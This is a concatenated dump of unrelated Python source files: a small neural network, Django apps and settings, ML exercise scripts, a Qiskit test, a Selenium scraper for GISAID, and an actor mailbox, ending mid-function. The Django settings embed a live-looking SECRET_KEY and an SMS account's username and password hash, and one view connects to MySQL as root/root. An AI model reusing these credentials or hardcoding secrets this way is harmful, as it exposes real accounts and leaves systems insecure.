text stringlengths 38 1.54M |
|---|
import numpy as np
def sigmoid(z):
return 1 / (1+np.exp(-z))
def sigmoid_prime(z):
return sigmoid(z)*(1-sigmoid(z))
class NeuralNetwork(object):
def __init__(self, X, Y):
self.alpha = 0.05
self.inputs = X
self.Y = Y
self.output = np.zeros(self.Y.shape)
self.hlayer1_size = 10
self.weights1 = np.random.rand(self.inputs.shape[1], self.hlayer1_size)
self.weights2 = np.random.rand(self.hlayer1_size, self.output.shape[1])
self.bias1 = np.random.rand(1)
self.bias2 = np.random.rand(1)
def forward_propagation(self):
self.layer1 = sigmoid(np.dot(self.inputs, self.weights1) + self.bias1)
self.output = sigmoid(np.dot(self.layer1, self.weights2) + self.bias2)
return self.output
def backward_propagation(self):
self.error = (self.output - self.Y)
self.odelta = self.error * sigmoid_prime(self.output)
self.dweights2 = np.dot(self.layer1.transpose(), self.odelta)
self.dbias2 = self.odelta
self.weights2 -= self.alpha/self.inputs.shape[0]*self.dweights2
self.bias2 -= self.alpha/self.inputs.shape[0]*np.sum(self.dbias2)
self.l1error = np.dot(self.odelta, self.weights2.transpose())
self.l1delta = self.l1error * sigmoid_prime(self.layer1)
self.dweights1 = np.dot(self.inputs.transpose(), self.l1delta)
self.dbias1 = self.l1delta
self.weights1 -= self.alpha/self.inputs.shape[0]*self.dweights1
self.bias1 -= self.alpha/self.inputs.shape[0]*np.sum(self.dbias1)
def saveWeights(self):
np.savetxt("params\\w1.txt", self.weights1, fmt="%s")
np.savetxt("params\\w2.txt", self.weights2, fmt="%s")
np.savetxt("params\\b1.txt", self.bias1, fmt="%s")
np.savetxt("params\\b2.txt", self.bias2, fmt="%s")
def predict(input, weights1, bias1, weights2, bias2):
layer1 = sigmoid(np.dot(input, weights1) + bias1)
output = sigmoid(np.dot(layer1, weights2) + bias2)
return output
def load_params(filename):
param = list()
with open(filename, 'r') as f:
for line in f.read().split('\n'):
row = [float(x) for x in line.split(' ')]
param.append(row)
return np.array(param)
def load_param(filename):
with open(filename, 'r') as f:
param = [float(x) for x in f.read().split('\n')]
return np.array(param)
if __name__ == "__main__":
'''epochs = 20000
features = np.array([[0,1,0], [0,0,1], [1,0,0], [1,1,0], [1,1,1]])
labels = np.array([[1,0,0,1,1]])
labels = labels.reshape(5,1)
NN = NeuralNetwork(features, labels)
for i in range(epochs):
predicted = NN.forward_propagation()
error = (predicted - labels)
print("Epoch : " + str(i) + ", Error : " + str(error.sum()))
NN.backward_propagation()
NN.saveWeights()'''
weights1 = load_params('params\\w1.txt')
weights2 = load_param('params\\w2.txt')
bias1 = load_param('params\\b1.txt')
bias2 = load_param('params\\b2.txt')
test = np.array([[1,0,0]])
predicted = predict(test, weights1, bias1, weights2, bias2)
print(predicted)
test = np.array([[0,1,0]])
predicted = predict(test, weights1, bias1, weights2, bias2)
print(predicted) |
from django.db import models
from django.contrib import admin
#ACTOR = MATERIAL
#PELICULA = ENCABEZADO
#ACTUACION = DESCRIPCION
class Material(models.Model):
nombre = models.CharField(max_length=100)
unidad = models.CharField(max_length=30)
precio = models.CharField(max_length=30)
def __str__(self):
return self.nombre
class Encabezado(models.Model):
fecha = models.DateField()
encargado = models.CharField(max_length=60)
materiales = models.ManyToManyField(Material, through='Descripcion')
def __str__(self):
return self.encargado
class Descripcion (models.Model):
material = models.ForeignKey(Material, on_delete=models.CASCADE)
encabezado = models.ForeignKey(Encabezado, on_delete=models.CASCADE)
class DescripcionInLine(admin.TabularInline):
model = Descripcion
extra = 1
class MaterialAdmin(admin.ModelAdmin):
inlines = (DescripcionInLine,)
class EncabezadoAdmin (admin.ModelAdmin):
inlines = (DescripcionInLine,)
|
from load_data_ex1 import *
from normalize_features import *
from gradient_descent import *
from plot_data_function import *
from plot_boundary import *
import matplotlib.pyplot as plt
from plot_sigmoid import *
from return_test_set import *
from compute_cost import *
import os
figures_folder = os.path.join(os.getcwd(), 'figures')
if not os.path.exists(figures_folder):
os.makedirs(figures_folder, exist_ok=True)
# this loads our data
X, y = load_data_ex1()
# split the dataset into training and test set, using random shuffling
train_samples = 20
X_train, y_train, X_test, y_test = return_test_set(X, y, train_samples)
# Compute mean and std on train set
# Normalize both train and test set using these mean and std values
X_train_normalized, mean_vec, std_vec = normalize_features(X_train)
X_test_normalized = normalize_features(X_test, mean_vec, std_vec)
# After normalizing, we append a column of ones to X_normalized, as the bias term
# We append the column to the dimension of columns (i.e., 1)
# We do this for both train and test set
column_of_ones = np.ones((X_train_normalized.shape[0], 1))
X_train_normalized = np.append(column_of_ones, X_train_normalized, axis=1)
column_of_ones = np.ones((X_test_normalized.shape[0], 1))
X_test_normalized = np.append(column_of_ones, X_test_normalized, axis=1)
# initialise trainable parameters theta, set learning rate alpha and number of iterations
theta = np.zeros((3))
alpha = 5
iterations = 100
# call the gradient descent function to obtain the trained parameters theta_final and the cost vector
theta_final, cost_vector = gradient_descent(X_train_normalized, y_train, theta, alpha, iterations)
###################################################
# Train set
# Plot the cost for all iterations
fig, ax1 = plt.subplots()
plot_cost(cost_vector, ax1)
plot_filename = os.path.join(os.getcwd(), 'figures', 'ex2_train_cost.png')
plt.savefig(plot_filename)
min_cost = np.min(cost_vector)
argmin_cost = np.argmin(cost_vector)
print('Final training cost: {:.5f}'.format(cost_vector[-1]))
print('Minimum training cost: {:.5f}, on iteration #{}'.format(min_cost, argmin_cost+1))
# plot our data and decision boundary
fig, ax1 = plt.subplots()
ax1 = plot_data_function(X_train_normalized, y_train, ax1)
plot_boundary(X_train_normalized, theta_final, ax1)
# save the plotted decision boundary as a figure
plot_filename = os.path.join(os.getcwd(), 'figures', 'ex2_decision_boundary_train.png')
plt.savefig(plot_filename)
###################################################
# Test set
cost_test = compute_cost(X_test_normalized, y_test, theta_final)
print('Final test cost: {:.5f}'.format(cost_test))
fig, ax1 = plt.subplots()
ax1 = plot_data_function(X_test_normalized, y_test, ax1)
plot_boundary(X_test_normalized, theta_final, ax1)
# save the plotted decision boundary as a figure
plot_filename = os.path.join(os.getcwd(), 'figures', 'ex2_decision_boundary_test.png')
plt.savefig(plot_filename)
# enter non-interactive mode of matplotlib, to keep figures open
plt.ioff()
plt.show()
|
from django.shortcuts import render,redirect,HttpResponse
from django.views import View
import pymysql
import math
from .page import *
db = pymysql.connect("localhost","root","root",database="yishuo",cursorclass=pymysql.cursors.DictCursor)
class message(View):
def get(self,request):
page = request.GET.get("page") if request.GET.get("page") else 0
page = int(page)
num = 3
cursor = db.cursor()
sql = "select mid,mname,mcontent,content.ctext from message LEFT JOIN content on content.cid = message.mcid limit %s,%s"
cursor.execute(sql,(page*num,num))
result = cursor.fetchall()
sqls = "select count(*) as t from message"
cursor.execute(sqls)
nums = cursor.fetchone()
nums = nums["t"]
nums = math.ceil(nums/num)
return render(request, "message/message.html", {"data":result,"page":getpages(nums,page,"/message")})
class messageadd(View):
def get(self,request):
cursor = db.cursor()
sql = "select cid,ctext from content"
cursor.execute(sql)
result = cursor.fetchall()
return render(request,"message/messageadd.html",{"data":result})
def post(self,request):
cursor = db.cursor()
mname = request.POST.get("mname")
mcontent = request.POST.get("mcontent")
cid = request.POST.get("cid")
sql = "insert into message(mname,mcontent,mcid) VALUES (%s,%s,%s)"
cursor.execute(sql,[mname,mcontent,cid])
db.commit()
return redirect("/message/")
class messagedel(View):
def get(self,request):
mid = request.GET.get("mid")
cursor = db.cursor()
sql = "delete from message where mid=%s"
cursor.execute(sql,[mid])
db.commit()
return redirect("/message/")
class messageedit(View):
def get(self,request):
cursor = db.cursor()
mid = request.GET.get("mid")
sql = "select mid,mname,mcontent,content.ctext from message LEFT JOIN content on content.cid = message.mcid where mid=%s"
cursor.execute(sql,[mid])
result = cursor.fetchone()
sqls = "select * from content"
cursor.execute(sqls)
messageInfo = cursor.fetchall()
return render(request,"message/messageedit.html",{"data":result,"messageInfo":messageInfo})
def post(self,request):
cursor = db.cursor()
mid = request.POST.get("mid")
mname = request.POST.get("mname")
mcontent = request.POST.get("mcontent")
mcid = request.POST.get("mcid")
sql = "update message set mname=%s,mcontent=%s,mcid=%s where mid=%s"
cursor.execute(sql,[mname,mcontent,mcid,mid])
db.commit()
return redirect("/message/")
|
import os
API_ID = os.getenv("API_ID")
API_HASH = os.getenv("API_HASH")
BOT_TOKEN = os.getenv("BOT_TOKEN") |
from good_smell import AstSmell, LoggingTransformer
import ast
class YieldFrom(AstSmell):
"""Checks for yields inside for loops"""
@property
def transformer_class(self):
return YieldFromTransformer
@property
def warning_message(self):
return "Consider using yield from instead of yield inside of a for loop"
@property
def symbol(self):
return "yield-from"
class YieldFromTransformer(LoggingTransformer):
"""NodeTransformer that goes visits all the yields in fors and replaces them
with yield from"""
def visit_For(self, node: ast.For):
yield_from = ast.Expr(value=ast.YieldFrom(node.iter))
return ast.fix_missing_locations(yield_from)
@staticmethod
def is_smelly(node: ast.AST):
"""Check if the node is a yield inside a for"""
return (
isinstance(node, ast.For)
and len(node.body) == 1
and isinstance(node.body[0], ast.Expr)
and isinstance(node.body[0].value, ast.Yield)
)
|
# ! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = "Miller"
# Datetime: 2019/8/27 13:57
import datetime
import time
# print(time.strptime("2019-08-27 13:58:40.258622".rsplit(".", 1)[0], "%Y-%m-%d %X"))
# ####################################################################
# res = datetime.date(year=2019, month=8, day=27)
# print(res.year)
# print(res.month)
# print(res.day)
# print(type(res)) # <class 'datetime.date'>
# ####################################################################
# res = datetime.time(**{"hour": 13, "minute": 58, "second": 40})
# print(res.hour)
# print(res.minute)
# print(res.second)
# print(type(res)) # <class 'datetime.time'>
# ####################################################################
# print(datetime.datetime) # <class 'datetime.datetime'>
# ho = datetime.datetime.hour
# ####################################################################
# print(datetime.timedelta())
# d = datetime.datetime.now()
# print("原来的", d.today())
# print(d.timestamp())
# print(d.today())
# print(d.year)
# print(d.month)
# print(d.day)
# print(d.timetuple())
# ####################################################################
# res = d.replace(year=2999, month=11, day=30) # 返回一个新的时间对象
# print(res.today()) # 2999-11-30 14:32:37.730159 # 2019-08-27 14:33:19.666558
# print(datetime.date(2999, 11, 30))
# ####################################################################
# print(datetime.timedelta(2017, 10, 5, 12, 53, 35, 276589).days)
# print(datetime.timedelta(2017, 10, 5, 12, 53, 35, 276589).max)
# print(datetime.timedelta(2017, 10, 5, 12, 53, 35, 276589).min)
# ####################################################################
# print(datetime.datetime(2017, 10, 5, 12, 53, 35, 276589))
# ####################################################################
# datetime.datetime.now() + datetime.timedelta(4) # 当前时间 +4天
# print(datetime.datetime.now() - datetime.timedelta(hours=4)) # 当前时间+4小时
# ####################################################################
# print(datetime.datetime.now() + datetime.timedelta(days=2, hours=8))
# 2019-08-29 22:35:02
# print(time.time())
# #
# # print(datetime.datetime.now().timestamp())
# #####################################时间的转换###############################
# res = datetime.datetime.now()
#
# print(res)
# ret = res.timestamp() # 转换成时间戳
# print(ret)
# print(datetime.date.fromtimestamp(1566888190.790368))
# "2019-08-27 14:43:14.714593"
# #####################################时间的转换###############################
# print(datetime.datetime.now() + datetime.timedelta(4)) # 当前时间 +4天
"asbbcdvcsa"
# 给定一个字符串 返回这个字符串中, 不重复字符的 第一个的索引
|
###########################################################
#author:sunny, date:3/24/2019
#function:access the test case sequence, and setUp,tearDown
#are accessed by every test named by test at the beginning
###########################################################
#startend.py
#coding = utf-8
from selenium import webdriver
import time
import unittest
class StartEnd(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.get("https://github.com/sunnie2004")
def tearDown(self):
self.driver.quit() |
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2019, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test of UCCSD and HartreeFock Aqua extensions """
from test.chemistry import QiskitChemistryTestCase
from qiskit import BasicAer
from qiskit.aqua import QuantumInstance
from qiskit.aqua.algorithms import VQE
from qiskit.aqua.components.optimizers import SLSQP
from qiskit.chemistry.components.initial_states import HartreeFock
from qiskit.chemistry.components.variational_forms import UCCSD
from qiskit.chemistry.drivers import HDF5Driver
from qiskit.chemistry.core import Hamiltonian, QubitMappingType
class TestUCCSDHartreeFock(QiskitChemistryTestCase):
"""Test for these aqua extensions."""
def setUp(self):
super().setUp()
self.reference_energy = -1.1373060356951838
def test_uccsd_hf(self):
""" uccsd hf test """
driver = HDF5Driver(self.get_resource_path('test_driver_hdf5.hdf5'))
qmolecule = driver.run()
core = Hamiltonian(qubit_mapping=QubitMappingType.PARITY,
two_qubit_reduction=True)
qubit_op, _ = core.run(qmolecule)
optimizer = SLSQP(maxiter=100)
initial_state = HartreeFock(qubit_op.num_qubits,
core.molecule_info['num_orbitals'],
core.molecule_info['num_particles'],
qubit_mapping=core._qubit_mapping,
two_qubit_reduction=core._two_qubit_reduction)
var_form = UCCSD(qubit_op.num_qubits, depth=1,
num_orbitals=core.molecule_info['num_orbitals'],
num_particles=core.molecule_info['num_particles'],
initial_state=initial_state,
qubit_mapping=core._qubit_mapping,
two_qubit_reduction=core._two_qubit_reduction)
algo = VQE(qubit_op, var_form, optimizer)
result = algo.run(QuantumInstance(BasicAer.get_backend('statevector_simulator')))
result = core.process_algorithm_result(result)
self.assertAlmostEqual(result.energy, self.reference_energy, places=6)
|
locals() # Zwraca słownik z nazwami i wartościami lokalnych zmiennych
# Remove definition of variable.
# Delete part of the list and entries from dictionaries.
del()
var = 6
del(var) # var no more!
list = ['a', 'b', 'c', 'd']
del(list[0]) # Delete first element
dict = {'a': 1, 'b': 2, 'c': 3}
del(dict['b']) # Delete 'b' entry
|
import time
from selenium import webdriver
driver = webdriver.Chrome('path/to/chromedriver') # Optional argument, if not specified will search path.
driver.get('https://platform.gisaid.org/epi3/frontend#2b8eee');
driver.refresh() #刷新页面
#driver.maximize_window()
#填充用户名 密码 验证码
driver.find_element_by_id("elogin").send_keys('usename')
driver.find_element_by_id("epassword").send_keys('passwd')
driver.find_element_by_class_name("form_button_submit").click()
time.sleep(5)
driver.find_element_by_partial_link_text("EpiCoV™").click()
time.sleep(5)
driver.find_elements_by_class_name("sys-actionbar-action")[1].click()
page_num=67
for i in range(67):
a=time.time()
sim_num=len(driver.find_elements_by_class_name('yui-dt-rec'))
for x in range(sim_num):
print(x)
driver.find_elements_by_class_name('yui-dt-rec')[x].click()
time.sleep(3)
driver.switch_to.frame(0)
time.sleep(5)
#meta下载
driver.find_elements_by_class_name("sys-form-button-icon")[1].click()
time.sleep(5)
#fasta下载
driver.find_elements_by_class_name("sys-form-button-icon")[2].click()
time.sleep(10)
driver.find_elements_by_class_name("sys-form-button-icon")[0].click()
time.sleep(5)
driver.find_element_by_class_name('yui-pg-next').click()
time.sleep(5)
b=time.time()
print(b-a)
|
"""注册"""
import hashlib
from homework.ftp_finally.conf import conf
from homework.ftp_finally.conf import log_conf
def signup(user, pwd):
"""注册,对密码进行md5加密。"""
md5 = hashlib.md5('陈文波'.encode('utf-8'))
with open(conf.user_table, 'a', encoding='utf-8') as f1:
msg = user+'|'
md5.update(pwd)
secret_pwd = md5.hexdigest()
msg = msg + secret_pwd
# print(md5.hexdigest())
# log_conf.pr_log().info('{}'.format(md5.hexdigest()))
f1.write('{}\n'.format(msg))
def check_user(user):
"""判断user是否为已注册用户
:return True?False
"""
with open(conf.user_table, 'r', encoding='utf-8') as f1:
flag = True
for line in f1:
if user != line[:line.index('|')]: # 直接in不好
# log_conf.pr_log().debug(user+'|')
# self.request.send(b'0')
# signup.signup(user, pwd)
pass
else:
flag = False
if flag: # user 不存在
return True
else:# 已经存在同名user
return False
if __name__ == '__main__':
# signup('xiaochen', '123123')
print(check_user('chen123')) |
"""
Requires crack propagation data for two datasets to be manually exported
from the main application.
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import h5py
# Path to the results of the 'export-crack-propagation' command.
crackDataPath = 'PLACEHOLDER-PATH'
datasetNames = ['PTFE-Epoxy.csv', 'Steel-Epoxy.csv']
datasetShifts = [[0, 0], [-25, -30]]
def main():
datasetPaths = [os.path.join(crackDataPath, 'crack-propagation_{}.hdf'.format(n)) for n in datasetNames]
datasetNumber = len(datasetNames)
datasetH5Files = [h5py.File(path, 'r') for path in datasetPaths]
strainArrays = [f['strain'][...] for f in datasetH5Files]
strainMin = min([np.min(a) for a in strainArrays])
strainMax = max([np.max(a) for a in strainArrays])
frameSizes = [np.asarray(f['sigmaSkeleton'].shape[1:3]) for f in datasetH5Files]
maxFrameSize = [max([frameSizes[i][d] for i in range(datasetNumber)]) for d in range(0, 2)]
maxFrameSize = tuple(maxFrameSize)
print("Frame sizes: {}".format(frameSizes))
print("Max frame size: {}".format(maxFrameSize))
currentIndices = [0] * datasetNumber
for strainIndex, strainValue in enumerate(np.arange(int(strainMin), int(strainMax), 0.25)):
for i in range(datasetNumber):
while currentIndices[i] < strainArrays[i].shape[0] - 1 and \
strainArrays[i][currentIndices[i]] < strainValue:
currentIndices[i] += 1
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
# Create an empty RGB image.
image = np.zeros(maxFrameSize + (3,), dtype=np.float)
for i in range(datasetNumber):
sigmaSkeleton = datasetH5Files[i]['sigmaSkeleton'][currentIndices[i], ...]
sigmaSkeleton = np.pad(sigmaSkeleton, [(0, maxFrameSize[d] - sigmaSkeleton.shape[d]) for d in range(0, 2)],
mode='constant', constant_values=0)
sigmaSkeleton = np.roll(sigmaSkeleton, datasetShifts[i][0], axis=0)
sigmaSkeleton = np.roll(sigmaSkeleton, datasetShifts[i][1], axis=1)
image[sigmaSkeleton == 1] += (1.0, 0.0, 0.0) if i == 0 else (0.0, 0.0, 1.0)
ax.imshow(image.swapaxes(0, 1), origin='lower')
strainValues = [strainArrays[i][currentIndices[i]] for i in range(datasetNumber)]
strainValues = ['{:.3f}'.format(s) for s in strainValues]
frameNumbers = [datasetH5Files[i]['frameMap'][currentIndices[i]] for i in range(datasetNumber)]
ax.text(0.1, 0.1, "Strain: {}; Frame: {}".format(strainValues, frameNumbers), color='white')
fig.savefig(os.path.join(crackDataPath, 'crack-comparison_{}.png'.format(strainIndex)))
main()
|
#!/bin/python3
import netifaces as ni
import psutil
import os
import sys
def ip_get(interface:str)->str:
i = 0
result = []
address_list = psutil.net_if_addrs()
for nic in address_list.keys():
if (interface in ni.interfaces()[i]):
ip = ni.ifaddresses(ni.interfaces()[i])[ni.AF_INET][0]['addr']
return ip
i += 1
return "0.0.0.0"
if __name__=='__main__':
if (len(sys.argv) < 2):
print("Usage: python3 show_ip4.py [interface]")
exit(1)
argv = sys.argv[1]
print(ip_get(argv))
|
'''
You are given an amount denoted by value. You are also given an array of coins.
The array contains the denominations of the give coins.
You need to find the minimum number of coins to make the change for value using the coins of given denominations.
Also, keep in mind that you have infinite supply of the coins.
Example 1:
Input:
value = 5
numberOfCoins = 3
coins[] = {3,6,3}
Output: Not Possible
Explanation:We need to make the change for
value = 5 The denominations are {3,6,3}
It is certain that we cannot make 5 using
any of these coins.
Example 2:
Input:
value = 10
numberOfCoins = 4
coins[] = {2 5 3 6}
Output: 2
Explanation:We need to make the change for
value = 10 The denominations are {2,5,3,6}
We can use two 5 coins to make 10. So
minimum coins are 2.
https://www.geeksforgeeks.org/find-minimum-number-of-coins-that-make-a-change/
'''
import sys
def minCoins(coins, m, V):
# table[i] will be storing the minimum
# number of coins required for i value.
# So table[V] will have result
table = [0 for i in range(V + 1)]
# Base case (If given value V is 0)
table[0] = 0
# Initialize all table values as Infinite
for i in range(1, V + 1):
table[i] = sys.maxsize
# Compute minimum coins required
# for all values from 1 to V
for i in range(1, V + 1):
# Go through all coins smaller than i
for j in range(m):
if (coins[j] <= i):
sub_res = table[i - coins[j]]
if (sub_res != sys.maxsize):
table[i] = min(table[i], sub_res + 1)
return table[V]
# Driver Code
if __name__ == "__main__":
coins = [9, 6, 5, 1]
m = len(coins)
V = 11
print(minCoins(coins, m, V)) |
from abc import ABCMeta, abstractmethod
from asyncio import sleep
from threading import RLock
from enum import Enum
from typing import Optional
from . import mailbox_statistics, messages, queue
from .. import dispatcher, invoker
class MailBoxStatus(Enum):
IDLE = 0
BUSY = 1
class AbstractMailbox(metaclass=ABCMeta):
@abstractmethod
def post_user_message(self, msg):
raise NotImplementedError("Should Implement this method")
@abstractmethod
def post_system_message(self, msg):
raise NotImplementedError("Should Implement this method")
@abstractmethod
def start(self):
raise NotImplementedError("Should Implement this method")
class Mailbox(AbstractMailbox):
def __init__(self, system_messages_queue: queue.AbstractQueue, user_messages_queue: queue.AbstractQueue,
invoker: invoker.AbstractInvoker, dispatcher: dispatcher.AbstractDispatcher,
*statistics: Optional[mailbox_statistics.AbstractMailBoxStatistics]) -> None:
self.__system_messages_queue = system_messages_queue
self.__user_messages_queue = user_messages_queue
self.__statistics = statistics if statistics else []
self.__invoker = invoker
self.__dispatcher = dispatcher
self.__status = MailBoxStatus.IDLE
self.__suspended = False
self.__status_lock = RLock()
def post_system_message(self, message: object):
self.__system_messages_queue.push(message)
self.__schedule()
def post_user_message(self, message: object):
self.__user_messages_queue.push(message)
for stats in self.__statistics:
stats.message_posted()
self.__schedule()
def start(self):
for stats in self.__statistics:
stats.mailbox_stated()
def __schedule(self):
with self.__status_lock:
if self.__status == MailBoxStatus.IDLE:
self.__status = MailBoxStatus.BUSY
self.__dispatcher.schedule(self.__run)
async def __run(self):
while True:
with self.__status_lock:
if not self.__system_messages_queue.has_messages() and \
(self.__suspended or not self.__user_messages_queue.has_messages()):
self.__status = MailBoxStatus.IDLE
for stats in self.__statistics:
stats.mailbox_empty()
return
await self.__process_messages()
await sleep(0)
async def __process_messages(self):
throughput = self.__dispatcher.throughput
message = None
try:
for i in range(throughput):
message = self.__system_messages_queue.pop()
if message is not None:
if isinstance(message, messages.SuspendMailbox):
self.__suspended = True
elif isinstance(message, messages.ResumeMailbox):
self.__suspended = False
else:
await self.__invoker.invoke_system_message(message)
if self.__suspended:
break
message = self.__user_messages_queue.pop()
if message is not None:
await self.__invoker.invoke_user_message(message)
for stats in self.__statistics:
stats.message_received()
else:
break
except Exception as e:
self.__invoker.escalate_failure(e, message)
|
import random
rock = "👊"
paper = "✋"
scissors = "✌️"
choices = [rock, paper, scissors]
player = int(input(f"What do you choose? type 1 for {rock}, 2 for {paper} or 3 for {scissors}\n"))
print("You choose")
if player < 1 or player > 3:
print("Invalid")
ai = random.randint(1 , 3)
print("Artificial Intelligence choose")
print(choices[ai - 1])
print("You loose!, please follow simple instructions..")
elif player >= 1 or player <= 3:
print(choices[player - 1])
ai = random.randint(1 , 3)
print("Artificial Intelligence choose")
print(choices[ai - 1])
if player == ai:
print("Draw!, Try again..")
elif player == 1 and ai == 2 or player == 2 and ai == 3 or player == 3 and ai == 1:
print("You loose!, Pay your debt..")
else:
print("You Win!, get your rewards..")
# user_choice = int(input("What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors.\n"))
# if user_choice >= 3 or user_choice < 0:
# print("You typed an invalid number, you lose! ")
# else:
# print(game_images[user_choice])
# computer_choice = random.randint(0, 2)
# print("Computer chose:")
# print(game_images[computer_choice])
# if user_choice == 0 and computer_choice == 2:
# print("You win!")
# elif computer_choice == 0 and user_choice == 2:
# print("You lose")
# elif computer_choice > user_choice:
# print("You lose")
# elif user_choice > computer_choice:
# print("You win!")
# elif computer_choice == user_choice:
# print("It's a draw") |
"""
Django settings for djcems project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p1%p0=!)e+mh-u#+fs7$i^=#tt_m3gvv&^x5b*9xa%3em9pjvs'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'filebrowser',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'corsheaders',
'django_logtail',
'userprofile',
'vehicle',
'beacon',
'news',
'hello',
'misc',
'datastat',
# wysiwyg
'django_wysiwyg',
'tinymce',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
# 'django.middleware.locale.LocaleMiddleware',
)
ROOT_URLCONF = 'djcems.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djcems.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
},
# 'mysql': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'djrefiredb',
# 'USER': 'refire',
# 'PASSWORD': 'refire',
# 'HOST': '127.0.0.1',
# 'PORT': '3306',
# }
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'zh-Hans' # en-us
TIME_ZONE = 'Asia/Shanghai' # 'UTC', 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static_root')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
os.path.join(BASE_DIR, "media"),
]
# Cache
# CACHES = {
# "default": {
# "BACKEND": "django_redis.cache.RedisCache",
# "LOCATION": "redis://127.0.0.1:6379/0",
# "OPTIONS": {
# "CLIENT_CLASS": "django_redis.client.DefaultClient",
# }
# }
# }
#
# SESSION_ENGINE = "django.contrib.sessions.backends.cache"
# SESSION_CACHE_ALIAS = "default"
# rest framework
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated'
]
}
# CORS
CORS_ORIGIN_WHITELIST = (
'127.0.0.1:8100',
'localhost:8100',
'192.168.1.104:8100',
'10.10.5.81:8100',
'192.168.1.114:8100',
'',
'null',
)
CORS_ALLOW_CREDENTIALS = True
# CORS_EXPOSE_HEADERS = (
# "Access-Control-Allow-Origin",
# )
# LOG
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '[%(levelname)s] [%(clientip)s] [%(asctime)s] [%(module)s] [%(process)d] [%(thread)d] %(message)s'
}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
},
'file': {
'level': 'DEBUG',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': os.path.join(BASE_DIR, 'apilog.log'),
'when': 'midnight',
'formatter': 'verbose',
'interval': 1,
'backupCount': 0,
},
},
'loggers': {
# 'django': {
# 'handlers': ['console', 'file'],
# 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
# 'propagate': True,
# },
'django.request': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
'vehicle': {
'handlers': ['console', 'file'],
'level': 'DEBUG',
'propagate': True,
}
}
}
# huyi sms
SMS = {
'huyi': {
'username': 'cf_hongding',
'password': 'e6a52c828d56b46129fbf85c4cd164b3', # md5 already
}
}
# WYSIWYG
DJANGO_WYSIWYG_FLAVOR = "tinymce"
TINYMCE_DEFAULT_CONFIG = {
'plugins': "table,spellchecker,paste,searchreplace",
'theme': "advanced",
'cleanup_on_startup': True,
'custom_undo_redo_levels': 10,
}
# FILEBROWSER_MEDIA_URL = STATIC_URL + 'upload/'
LOGTAIL_FILES = {
'accesslog': '/var/log/apache2/app-access.log',
'django': os.path.join(BASE_DIR, 'apilog.log')
}
|
from urllib import parse
import itertools, json
from . import parsers, utils
def get_sitepage(url, cached_content=None):
""" Ask for new sitepage content from url and return a site page """
if not cached_content:
cached_content = utils.encoded_text_from_url(url)
soup = parsers.get_site_soup(cached_content)
return SitePage(soup, url=url)
def get_feedpage(url, cached_content=None, overtime=False):
""" Ask for new feedpage content from feed_url and return a feed page.
This function will attempt to parse JSON Feeds and XML Feeds before failing.
TODO: Add more intelligence to check the URL before trying to parse.
"""
if not cached_content:
cached_content = utils.encoded_text_from_url(url)
try:
feed = parsers.get_json_feed(cached_content)
return JSONFeedPage(feed, url=url)
